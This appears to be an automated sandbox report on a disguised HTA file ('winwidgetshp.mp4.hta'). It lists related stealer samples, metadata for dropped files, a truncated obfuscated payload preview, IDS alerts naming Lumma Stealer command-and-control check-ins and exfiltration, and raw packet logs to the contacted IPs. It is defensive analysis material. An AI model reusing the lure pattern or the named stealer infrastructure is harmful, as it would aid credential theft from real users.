                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.21.63.229
                                                                                                          LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.9.59
                                                                                                          CLOUDFLARENETUShttps://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.21.234.144
                                                                                                          nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 104.24.135.181
                                                                                                          swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.38.10
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.67.146
                                                                                                          7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.21.67.146
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.21.63.229
                                                                                                          LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.9.59
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eSupport.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                          • 104.21.18.182
                                                                                                          NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.18.182
                                                                                                          NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.18.182
                                                                                                          HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.18.182
                                                                                                          HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.18.182
                                                                                                          swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.18.182
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.21.18.182
                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.48.1
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.21.48.1
                                                                                                          Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.48.1
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                          • 104.21.48.1
                                                                                                          Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.48.1
                                                                                                          Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.48.1
                                                                                                          BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.48.1
                                                                                                          No context
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8003
                                                                                                          Entropy (8bit):4.840877972214509
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                          MD5:106D01F562D751E62B702803895E93E0
                                                                                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1300
                                                                                                          Entropy (8bit):5.397535305912226
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:3zWSKco4KmM6GjKbmOIKo+mN1s4RP09tEoUEJ0gt/NK3R8QHrg+:DWSU4Yymp+ms4Rc9tEoUl8NWR8QHt
                                                                                                          MD5:D7751E567F9C016DE88C56317B1C702F
                                                                                                          SHA1:B64D11B2C68AB7F4B6CB1C30DE87F11E2C4324A4
                                                                                                          SHA-256:800BDC18C74F1DA50E3020D9DC6158B2C3361D93AB0CB8C6F5B481CA29F4D0BC
                                                                                                          SHA-512:5D7DDFD49B2757D2F4E2C86C9BB556104E51840A9CE9DC5790A4981824241F090B5DB39A9DDDC127BFD32B41510DD79AD004CCEBAFB3CB02887337DC6DD222D4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          File type:data
                                                                                                          Entropy (8bit):6.083145650759699
                                                                                                          TrID:
                                                                                                            File name:winwidgetshp.mp4.hta
                                                                                                            File size:621'025 bytes
                                                                                                            MD5:c3e71edf7d2e73d4d84837aceaac29c7
                                                                                                            SHA1:ac74d41864ebc5faf280c49ef82027a47ef4cabf
                                                                                                            SHA256:a732b675bdf1d9e1a25f8236f6c9dcb79e756a46bdfc84601c01932e1af1795b
                                                                                                            SHA512:695d1805215fdbca0aac5ad91c0ada1c3cee378126695789ba19cdf82c7d58834686c78216af51a145d9e4aab5ca434ad96754ec1bec57f336ef2f63bb8e0627
                                                                                                            SSDEEP:6144:kYKysIkPentesqL1/Ru20RtwUIebgkgaeeDkJ9qeWeoeMC:kSsb
                                                                                                            TLSH:1FD4C1465A738615E83C8974EED7CA382471BDC84C0487AE4AEDB435304B6B47ED6AFC
                                                                                                            File Content Preview:66b75r6eX63S74z69m6fA6eq20O4cT4ff77h70M71A71S28e62U6fo56c4dx29I7bQ76o61W72t20g46v59a75h59G55D3dT20t27j27O3bO66B6fc72Z20i28m76a61P72X20o6eu52b65U71u55d20k3dW20B30y3bz6eL52D65A71Z55S20q3cZ20J62H6fQ56M4dn2ed6cm65D6ed67s74P68u3bL20h6eA52Q65h71y55E2ba2bg29D7bW
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-22T13:44:20.650107+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650007104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:21.556888+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.650007104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:21.556888+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650007104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:22.788622+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650008104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:23.596894+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.650008104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:23.596894+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650008104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:25.100378+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650009104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:27.404929+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650010104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:29.685593+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650011104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:32.200268+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650012104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:34.269635+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650014104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:35.070934+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.650014104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:36.342390+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650015104.21.48.1443TCP
                                                                                                            2024-12-22T13:44:37.097108+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650015104.21.48.1443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 22, 2024 13:42:12.213433027 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:12.213486910 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:12.213591099 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:12.222944021 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:12.222961903 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:13.453345060 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:13.454087019 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:13.455344915 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:13.455373049 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:13.455805063 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:13.467669964 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:13.511327028 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.206111908 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.206167936 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.206212997 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.206239939 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.206248999 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.206273079 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.206300974 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.206330061 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.206516027 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.206525087 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.214368105 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.214521885 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.214529037 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.222917080 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.223167896 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.223176003 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.231515884 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.231652021 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.231666088 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.281110048 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.325567007 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.371784925 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.371802092 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.402033091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.402158976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.402189970 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.402189970 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.402232885 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.402261972 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.413218021 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.413252115 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.413309097 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.413317919 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.414387941 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.421097994 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.421236992 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.421355963 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.421365023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.429272890 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.429362059 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.429375887 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.437180996 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.437280893 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.437294960 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.444904089 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.444986105 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.444999933 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.452855110 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.452959061 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.452971935 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.460932970 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.460971117 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.461047888 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.461062908 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.461143017 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.468955040 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.469125032 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.469263077 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.469276905 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.476048946 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.476146936 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.476160049 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.531013012 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.589878082 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.589886904 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.590163946 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.591161013 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.593636036 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.596005917 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.596013069 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.596441984 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.600796938 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.600804090 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.600888968 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.605731964 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.605739117 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.605820894 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.610466957 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.610474110 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.610829115 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.614965916 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.615052938 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.623989105 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.624090910 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.628510952 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.628623962 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.633148909 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.633304119 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.637737036 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.637793064 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.642352104 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.642427921 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.651400089 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.651683092 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.655946016 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.656081915 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.660576105 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.660669088 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.665122986 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.665206909 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.705591917 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.705841064 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.705849886 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.705996990 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.707822084 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.708328009 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.782090902 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.782320976 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.784054041 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.784130096 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.787043095 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.787172079 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.790326118 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.790477037 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.790492058 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.790640116 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.795798063 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.795861006 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.795883894 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.795895100 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.795919895 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.798703909 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.798867941 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.798875093 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.798995018 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.804652929 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.804718971 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.804728985 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.804775000 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.807404041 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.807554960 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.813040018 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.813097954 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.813108921 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.813154936 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.819117069 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.819175005 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.819200993 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.819247007 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.821897984 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.821949959 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.824728966 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.824806929 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.824815989 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.824870110 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.830449104 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.830508947 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.830571890 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.830626011 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.836147070 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.836221933 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.836252928 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.842120886 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.842179060 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:15.842190027 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.844860077 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:15.844908953 CET49720443192.168.2.6104.21.18.182
